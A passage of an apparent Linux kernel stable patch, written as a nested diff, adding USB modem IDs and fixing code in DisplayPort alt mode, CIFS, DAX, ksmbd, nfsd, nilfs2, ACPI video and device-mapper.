++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, 0x0900, 0xff, 0, 0), /* RM500U-CN */
++	  .driver_info = ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+@@ -1300,6 +1302,14 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1075, 0xff),	/* Telit FN990 (PCIe) */
+ 	  .driver_info = RSVD(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1080, 0xff),	/* Telit FE990 (rmnet) */
++	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(2) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1081, 0xff),	/* Telit FE990 (MBIM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1082, 0xff),	/* Telit FE990 (RNDIS) */
++	  .driver_info = NCTRL(2) | RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1083, 0xff),	/* Telit FE990 (ECM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910),
+ 	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910_DUAL_MODEM),
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 50b24096eb7f1..0ea50b44effe2 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -112,8 +112,12 @@ static int dp_altmode_configure(struct dp_altmode *dp, u8 con)
+ 		if (dp->data.status & DP_STATUS_PREFER_MULTI_FUNC &&
+ 		    pin_assign & DP_PIN_ASSIGN_MULTI_FUNC_MASK)
+ 			pin_assign &= DP_PIN_ASSIGN_MULTI_FUNC_MASK;
+-		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK)
++		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK) {
+ 			pin_assign &= DP_PIN_ASSIGN_DP_ONLY_MASK;
++			/* Default to pin assign C if available */
++			if (pin_assign & BIT(DP_PIN_ASSIGN_C))
++				pin_assign = BIT(DP_PIN_ASSIGN_C);
++		}
+ 
+ 		if (!pin_assign)
+ 			return -EINVAL;
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+index 6d13f8207e96a..ace11a1a7c8ab 100644
+--- a/fs/cifs/fs_context.c
++++ b/fs/cifs/fs_context.c
+@@ -441,13 +441,14 @@ out:
+  * but there are some bugs that prevent rename from working if there are
+  * multiple delimiters.
+  *
+- * Returns a sanitized duplicate of @path. The caller is responsible for
+- * cleaning up the original.
++ * Returns a sanitized duplicate of @path. @gfp indicates the GFP_* flags
++ * for kstrdup.
++ * The caller is responsible for freeing the original.
+  */
+ #define IS_DELIM(c) ((c) == '/' || (c) == '\\')
+-static char *sanitize_path(char *path)
++char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
+ {
+-	char *cursor1 = path, *cursor2 = path;
++	char *cursor1 = prepath, *cursor2 = prepath;
+ 
+ 	/* skip all prepended delimiters */
+ 	while (IS_DELIM(*cursor1))
+@@ -469,7 +470,7 @@ static char *sanitize_path(char *path)
+ 		cursor2--;
+ 
+ 	*(cursor2) = '\0';
+-	return kstrdup(path, GFP_KERNEL);
++	return kstrdup(prepath, gfp);
+ }
+ 
+ /*
+@@ -531,7 +532,7 @@ smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
+ 	if (!*pos)
+ 		return 0;
+ 
+-	ctx->prepath = sanitize_path(pos);
++	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
+ 	if (!ctx->prepath)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index 3de00e7127ec4..f4eaf85589022 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -287,4 +287,7 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+ #define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
++
++extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
++
+ #endif
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 5542893ef03f7..2fae6b08314d9 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1297,7 +1297,7 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	kfree(cifs_sb->prepath);
+ 
+ 	if (prefix && *prefix) {
+-		cifs_sb->prepath = kstrdup(prefix, GFP_ATOMIC);
++		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
+ 		if (!cifs_sb->prepath)
+ 			return -ENOMEM;
+ 
+diff --git a/fs/dax.c b/fs/dax.c
+index 3e457a16c7d18..2ababb89918de 100644
+--- a/fs/dax.c
++++ b/fs/dax.c
+@@ -781,6 +781,33 @@ out:
+ 	return ret;
+ }
+ 
++static int __dax_clear_dirty_range(struct address_space *mapping,
++		pgoff_t start, pgoff_t end)
++{
++	XA_STATE(xas, &mapping->i_pages, start);
++	unsigned int scanned = 0;
++	void *entry;
++
++	xas_lock_irq(&xas);
++	xas_for_each(&xas, entry, end) {
++		entry = get_unlocked_entry(&xas, 0);
++		xas_clear_mark(&xas, PAGECACHE_TAG_DIRTY);
++		xas_clear_mark(&xas, PAGECACHE_TAG_TOWRITE);
++		put_unlocked_entry(&xas, entry, WAKE_NEXT);
++
++		if (++scanned % XA_CHECK_SCHED)
++			continue;
++
++		xas_pause(&xas);
++		xas_unlock_irq(&xas);
++		cond_resched();
++		xas_lock_irq(&xas);
++	}
++	xas_unlock_irq(&xas);
++
++	return 0;
++}
++
+ /*
+  * Delete DAX entry at @index from @mapping.  Wait for it
+  * to be unlocked before deleting it.
+@@ -1258,15 +1285,20 @@ static s64 dax_unshare_iter(struct iomap_iter *iter)
+ 	/* don't bother with blocks that are not shared to start with */
+ 	if (!(iomap->flags & IOMAP_F_SHARED))
+ 		return length;
+-	/* don't bother with holes or unwritten extents */
+-	if (srcmap->type == IOMAP_HOLE || srcmap->type == IOMAP_UNWRITTEN)
+-		return length;
+ 
+ 	id = dax_read_lock();
+ 	ret = dax_iomap_direct_access(iomap, pos, length, &daddr, NULL);
+ 	if (ret < 0)
+ 		goto out_unlock;
+ 
++	/* zero the distance if srcmap is HOLE or UNWRITTEN */
++	if (srcmap->flags & IOMAP_F_SHARED || srcmap->type == IOMAP_UNWRITTEN) {
++		memset(daddr, 0, length);
++		dax_flush(iomap->dax_dev, daddr, length);
++		ret = length;
++		goto out_unlock;
++	}
++
+ 	ret = dax_iomap_direct_access(srcmap, pos, length, &saddr, NULL);
+ 	if (ret < 0)
+ 		goto out_unlock;
+@@ -1435,6 +1467,16 @@ static loff_t dax_iomap_iter(const struct iomap_iter *iomi,
+ 	 * written by write(2) is visible in mmap.
+ 	 */
+ 	if (iomap->flags & IOMAP_F_NEW || cow) {
++		/*
++		 * Filesystem allows CoW on non-shared extents. The src extents
++		 * may have been mmapped with dirty mark before. To be able to
++		 * invalidate its dax entries, we need to clear the dirty mark
++		 * in advance.
++		 */
++		if (cow)
++			__dax_clear_dirty_range(iomi->inode->i_mapping,
++						pos >> PAGE_SHIFT,
++						(end - 1) >> PAGE_SHIFT);
+ 		invalidate_inode_pages2_range(iomi->inode->i_mapping,
+ 					      pos >> PAGE_SHIFT,
+ 					      (end - 1) >> PAGE_SHIFT);
+@@ -2022,8 +2064,8 @@ int dax_dedupe_file_range_compare(struct inode *src, loff_t srcoff,
+ 
+ 	while ((ret = iomap_iter(&src_iter, ops)) > 0 &&
+ 	       (ret = iomap_iter(&dst_iter, ops)) > 0) {
+-		compared = dax_range_compare_iter(&src_iter, &dst_iter, len,
+-						  same);
++		compared = dax_range_compare_iter(&src_iter, &dst_iter,
++				min(src_iter.len, dst_iter.len), same);
+ 		if (compared < 0)
+ 			return ret;
+ 		src_iter.processed = dst_iter.processed = compared;
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 2be9d7460494b..b8f9d627f241d 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -326,10 +326,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+-		conn->request_buf = kvmalloc(size,
+-					     GFP_KERNEL |
+-					     __GFP_NOWARN |
+-					     __GFP_NORETRY);
++		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+ 		if (!conn->request_buf)
+ 			break;
+ 
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 394b6ceac4312..0d8242789dc8f 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -289,10 +289,7 @@ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ 	work->request_buf = conn->request_buf;
+ 	conn->request_buf = NULL;
+ 
+-	if (ksmbd_init_smb_server(work)) {
+-		ksmbd_free_work_struct(work);
+-		return -EINVAL;
+-	}
++	ksmbd_init_smb_server(work);
+ 
+ 	ksmbd_conn_enqueue_request(work);
+ 	atomic_inc(&conn->r_count);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index d0e76e2a14982..7e0b62f94a079 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -235,9 +235,6 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	struct smb2_negotiate_rsp *rsp;
+ 	struct ksmbd_conn *conn = work->conn;
+ 
+-	if (conn->need_neg == false)
+-		return -EINVAL;
+-
+ 	*(__be32 *)work->response_buf =
+ 		cpu_to_be32(conn->vals->header_size);
+ 
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 5ab93fe0dec3f..212dfff8e764c 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -283,20 +283,121 @@ err_out:
+ 	return BAD_PROT_ID;
+ }
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work)
++#define SMB_COM_NEGOTIATE_EX	0x0
++
++/**
++ * get_smb1_cmd_val() - get smb command value from smb header
++ * @work:	smb work containing smb header
++ *
++ * Return:      smb command value
++ */
++static u16 get_smb1_cmd_val(struct ksmbd_work *work)
+ {
+-	struct ksmbd_conn *conn = work->conn;
++	return SMB_COM_NEGOTIATE_EX;
++}
+ 
+-	if (conn->need_neg == false)
++/**
++ * init_smb1_rsp_hdr() - initialize smb negotiate response header
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++static int init_smb1_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
++	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
++
++	/*
++	 * Remove 4 byte direct TCP header.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4);
++
++	rsp_hdr->Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
++	rsp_hdr->Flags = SMBFLG_RESPONSE;
++	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++	rsp_hdr->Pid = rcv_hdr->Pid;
++	rsp_hdr->Mid = rcv_hdr->Mid;
++	return 0;
++}
++
++/**
++ * smb1_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb1_check_user_session(struct ksmbd_work *work)
++{
++	unsigned int cmd = work->conn->ops->get_cmd_val(work);
++
++	if (cmd == SMB_COM_NEGOTIATE_EX)
+ 		return 0;
+ 
+-	init_smb3_11_server(conn);
++	return -EINVAL;
++}
++
++/**
++ * smb1_allocate_rsp_buf() - allocate response buffer for a command
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL | __GFP_ZERO);
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++
++	if (!work->response_buf) {
++		pr_err("Failed to allocate %u bytes buffer\n",
++				MAX_CIFS_SMALL_BUFFER_SIZE);
++		return -ENOMEM;
++	}
+ 
+-	if (conn->ops->get_cmd_val(work) != SMB_COM_NEGOTIATE)
+-		conn->need_neg = false;
+ 	return 0;
+ }
+ 
++static struct smb_version_ops smb1_server_ops = {
++	.get_cmd_val = get_smb1_cmd_val,
++	.init_rsp_hdr = init_smb1_rsp_hdr,
++	.allocate_rsp_buf = smb1_allocate_rsp_buf,
++	.check_user_session = smb1_check_user_session,
++};
++
++static int smb1_negotiate(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
++}
++
++static struct smb_version_cmds smb1_server_cmds[1] = {
++	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
++};
++
++static void init_smb1_server(struct ksmbd_conn *conn)
++{
++	conn->ops = &smb1_server_ops;
++	conn->cmds = smb1_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++}
++
++void ksmbd_init_smb_server(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	__le32 proto;
++
++	if (conn->need_neg == false)
++		return;
++
++	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER)
++		init_smb1_server(conn);
++	else
++		init_smb3_11_server(conn);
++}
++
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+ 				      struct ksmbd_file *dir,
+ 				      struct ksmbd_dir_info *d_info,
+@@ -444,20 +545,10 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+ 
+-	/*
+-	 * Remove 4 byte direct TCP header, add 2 byte bcc and
+-	 * 2 byte DialectIndex.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	/* Add 2 byte bcc and 2 byte DialectIndex. */
++	inc_rfc1001_len(work->response_buf, 4);
+ 	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+ 
+-	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
+-	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
+-	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
+-	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
+-		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
+-
+ 	neg_rsp->hdr.WordCount = 1;
+ 	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+ 	neg_rsp->ByteCount = 0;
+@@ -473,24 +564,13 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		ksmbd_negotiate_smb_dialect(work->request_buf);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+ 
+-	if (command == SMB2_NEGOTIATE_HE) {
+-		struct smb2_hdr *smb2_hdr = smb2_get_msg(work->request_buf);
+-
+-		if (smb2_hdr->ProtocolId != SMB2_PROTO_NUMBER) {
+-			ksmbd_debug(SMB, "Downgrade to SMB1 negotiation\n");
+-			command = SMB_COM_NEGOTIATE;
+-		}
+-	}
+-
+ 	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+-		init_smb2_neg_rsp(work);
+ 		return ret;
+ 	}
+ 
+ 	if (command == SMB_COM_NEGOTIATE) {
+ 		if (__smb2_negotiate(conn)) {
+-			conn->need_neg = true;
+ 			init_smb3_11_server(conn);
+ 			init_smb2_neg_rsp(work);
+ 			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index d30ce4c1a1517..9130d2e3cd78c 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -427,7 +427,7 @@ bool ksmbd_smb_request(struct ksmbd_conn *conn);
+ 
+ int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work);
++void ksmbd_init_smb_server(struct ksmbd_work *work);
+ 
+ struct ksmbd_kstat;
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+diff --git a/fs/namespace.c b/fs/namespace.c
+index ab467ee583411..14fa31f17d779 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -4286,9 +4286,9 @@ out:
+ 	unlock_mount_hash();
+ 
+ 	if (kattr->propagation) {
+-		namespace_unlock();
+ 		if (err)
+ 			cleanup_group_ids(mnt, NULL);
++		namespace_unlock();
+ 	}
+ 
+ 	return err;
+diff --git a/fs/nfsd/blocklayout.c b/fs/nfsd/blocklayout.c
+index 04697f8dc37d6..01d7fd108cf3d 100644
+--- a/fs/nfsd/blocklayout.c
++++ b/fs/nfsd/blocklayout.c
+@@ -297,6 +297,7 @@ nfsd4_block_get_device_info_scsi(struct super_block *sb,
+ 
+ out_free_dev:
+ 	kfree(dev);
++	gdp->gd_device = NULL;
+ 	return ret;
+ }
+ 
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index 2a815f5a52c4b..4039ffcf90ba5 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -946,8 +946,8 @@ static const struct cred *get_backchannel_cred(struct nfs4_client *clp, struct r
+ 		if (!kcred)
+ 			return NULL;
+ 
+-		kcred->uid = ses->se_cb_sec.uid;
+-		kcred->gid = ses->se_cb_sec.gid;
++		kcred->fsuid = ses->se_cb_sec.uid;
++		kcred->fsgid = ses->se_cb_sec.gid;
+ 		return kcred;
+ 	}
+ }
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 97edb32be77f1..7799835c2196e 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2476,10 +2476,12 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 	for (i = 0; i < argp->opcnt; i++) {
+ 		op = &argp->ops[i];
+ 		op->replay = NULL;
++		op->opdesc = NULL;
+ 
+ 		if (xdr_stream_decode_u32(argp->xdr, &op->opnum) < 0)
+ 			return false;
+ 		if (nfsd4_opnum_in_range(argp, op)) {
++			op->opdesc = OPDESC(op);
+ 			op->status = nfsd4_dec_ops[op->opnum](argp, &op->u);
+ 			if (op->status != nfs_ok)
+ 				trace_nfsd_compound_decode_err(argp->rqstp,
+@@ -2490,7 +2492,7 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 			op->opnum = OP_ILLEGAL;
+ 			op->status = nfserr_op_illegal;
+ 		}
+-		op->opdesc = OPDESC(op);
++
+ 		/*
+ 		 * We'll try to cache the result in the DRC if any one
+ 		 * op in the compound wants to be cached:
+@@ -5398,10 +5400,8 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	__be32 *p;
+ 
+ 	p = xdr_reserve_space(xdr, 8);
+-	if (!p) {
+-		WARN_ON_ONCE(1);
+-		return;
+-	}
++	if (!p)
++		goto release;
+ 	*p++ = cpu_to_be32(op->opnum);
+ 	post_err_offset = xdr->buf->len;
+ 
+@@ -5416,8 +5416,6 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	op->status = encoder(resp, op->status, &op->u);
+ 	if (op->status)
+ 		trace_nfsd_compound_encode_err(rqstp, op->opnum, op->status);
+-	if (opdesc && opdesc->op_release)
+-		opdesc->op_release(&op->u);
+ 	xdr_commit_encode(xdr);
+ 
+ 	/* nfsd4_check_resp_size guarantees enough room for error status */
+@@ -5458,6 +5456,9 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	}
+ status:
+ 	*p = op->status;
++release:
++	if (opdesc && opdesc->op_release)
++		opdesc->op_release(&op->u);
+ }
+ 
+ /* 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 76c3bd88b8582..7aea13c33ddf3 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2607,11 +2607,10 @@ static int nilfs_segctor_thread(void *arg)
+ 	goto loop;
+ 
+  end_thread:
+-	spin_unlock(&sci->sc_state_lock);
+-
+ 	/* end sync. */
+ 	sci->sc_task = NULL;
+ 	wake_up(&sci->sc_wait_task); /* for nilfs_segctor_kill_thread() */
++	spin_unlock(&sci->sc_state_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 1422b8ba24ed6..77f1e5778d1c8 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -482,6 +482,7 @@ static void nilfs_put_super(struct super_block *sb)
+ 		up_write(&nilfs->ns_sem);
+ 	}
+ 
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+@@ -1105,6 +1106,7 @@ nilfs_fill_super(struct super_block *sb, void *data, int silent)
+ 	nilfs_put_root(fsroot);
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 3a4c9c150cbf5..2894152a6b25c 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -87,7 +87,6 @@ void destroy_nilfs(struct the_nilfs *nilfs)
+ {
+ 	might_sleep();
+ 	if (nilfs_init(nilfs)) {
+-		nilfs_sysfs_delete_device_group(nilfs);
+ 		brelse(nilfs->ns_sbh[0]);
+ 		brelse(nilfs->ns_sbh[1]);
+ 	}
+@@ -305,6 +304,10 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 		goto failed;
+ 	}
+ 
++	err = nilfs_sysfs_create_device_group(sb);
++	if (unlikely(err))
++		goto sysfs_error;
++
+ 	if (valid_fs)
+ 		goto skip_recovery;
+ 
+@@ -366,6 +369,9 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 	goto failed;
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
++
++ sysfs_error:
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_dat);
+@@ -697,10 +703,6 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 	if (err)
+ 		goto failed_sbh;
+ 
+-	err = nilfs_sysfs_create_device_group(sb);
+-	if (err)
+-		goto failed_sbh;
+-
+ 	set_nilfs_init(nilfs);
+ 	err = 0;
+  out:
+diff --git a/include/acpi/video.h b/include/acpi/video.h
+index 8ed9bec03e534..ff5a8da5d8832 100644
+--- a/include/acpi/video.h
++++ b/include/acpi/video.h
+@@ -59,8 +59,6 @@ extern void acpi_video_unregister(void);
+ extern void acpi_video_register_backlight(void);
+ extern int acpi_video_get_edid(struct acpi_device *device, int type,
+ 			       int device_id, void **edid);
+-extern enum acpi_backlight_type acpi_video_get_backlight_type(void);
+-extern bool acpi_video_backlight_use_native(void);
+ /*
+  * Note: The value returned by acpi_video_handles_brightness_key_presses()
+  * may change over time and should not be cached.
+@@ -69,6 +67,19 @@ extern bool acpi_video_handles_brightness_key_presses(void);
+ extern int acpi_video_get_levels(struct acpi_device *device,
+ 				 struct acpi_video_device_brightness **dev_br,
+ 				 int *pmax_level);
++
++extern enum acpi_backlight_type __acpi_video_get_backlight_type(bool native,
++								bool *auto_detect);
++
++static inline enum acpi_backlight_type acpi_video_get_backlight_type(void)
++{
++	return __acpi_video_get_backlight_type(false, NULL);
++}
++
++static inline bool acpi_video_backlight_use_native(void)
++{
++	return __acpi_video_get_backlight_type(true, NULL) == acpi_backlight_native;
++}
+ #else
+ static inline void acpi_video_report_nolcd(void) { return; };
+ static inline int acpi_video_register(void) { return -ENODEV; }
+diff --git a/include/linux/device-mapper.h b/include/linux/device-mapper.h
+index 04c6acf7faaa5..201dd1ab7f1c6 100644
+--- a/include/linux/device-mapper.h
++++ b/include/linux/device-mapper.h
+@@ -87,10 +87,10 @@ typedef int (*dm_preresume_fn) (struct dm_target *ti);
+ typedef void (*dm_resume_fn) (struct dm_target *ti);
+ 
+ typedef void (*dm_status_fn) (struct dm_target *ti, status_type_t status_type,
+-			      unsigned status_flags, char *result, unsigned maxlen);
++			      unsigned int status_flags, char *result, unsigned int maxlen);
+ 
+-typedef int (*dm_message_fn) (struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen);
++typedef int (*dm_message_fn) (struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen);
+ 
+ typedef int (*dm_prepare_ioctl_fn) (struct dm_target *ti, struct block_device **bdev);
+ 
+@@ -187,7 +187,7 @@ struct target_type {
+ 	uint64_t features;
+ 	const char *name;
+ 	struct module *module;
+-	unsigned version[3];
++	unsigned int version[3];
+ 	dm_ctr_fn ctr;
+ 	dm_dtr_fn dtr;
+ 	dm_map_fn map;
+@@ -313,31 +313,31 @@ struct dm_target {
+ 	 * It is a responsibility of the target driver to remap these bios
+ 	 * to the real underlying devices.
+ 	 */
+-	unsigned num_flush_bios;
++	unsigned int num_flush_bios;
+ 
+ 	/*
+ 	 * The number of discard bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_discard_bios;
++	unsigned int num_discard_bios;
+ 
+ 	/*
+ 	 * The number of secure erase bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_secure_erase_bios;
++	unsigned int num_secure_erase_bios;
+ 
+ 	/*
+ 	 * The number of WRITE ZEROES bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_write_zeroes_bios;
++	unsigned int num_write_zeroes_bios;
+ 
+ 	/*
+ 	 * The minimum number of extra bytes allocated in each io for the
+ 	 * target to use.
+ 	 */
+-	unsigned per_io_data_size;
++	unsigned int per_io_data_size;
+ 
+ 	/* target specific data */
+ 	void *private;
+@@ -383,7 +383,7 @@ struct dm_target {
+ 
+ void *dm_per_bio_data(struct bio *bio, size_t data_size);
+ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size);
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio);
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio);
+ 
+ u64 dm_start_time_ns_from_clone(struct bio *bio);
+ 
+@@ -394,7 +394,7 @@ void dm_unregister_target(struct target_type *t);
+  * Target argument parsing.
+  */
+ struct dm_arg_set {
+-	unsigned argc;
++	unsigned int argc;
+ 	char **argv;
+ };
+ 
+@@ -403,8 +403,8 @@ struct dm_arg_set {
+  * the error message to use if the number is found to be outside that range.
+  */
+ struct dm_arg {
+-	unsigned min;
+-	unsigned max;
++	unsigned int min;
++	unsigned int max;
+ 	char *error;
+ };
+ 
+@@ -413,7 +413,7 @@ struct dm_arg {
+  * returning -EINVAL and setting *error.
+  */
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error);
++		unsigned int *value, char **error);
+ 
+ /*
+  * Process the next argument as the start of a group containing between
+@@ -421,7 +421,7 @@ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+  * *num_args or, if invalid, return -EINVAL and set *error.
+  */
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *num_args, char **error);
++		      unsigned int *num_args, char **error);
+ 
+ /*
+  * Return the current argument and shift to the next.
+@@ -431,7 +431,7 @@ const char *dm_shift_arg(struct dm_arg_set *as);
+ /*
+  * Move through num_args arguments.
+  */
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args);
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args);
+ 
+ /*-----------------------------------------------------------------
+  * Functions for creating and manipulating mapped devices.
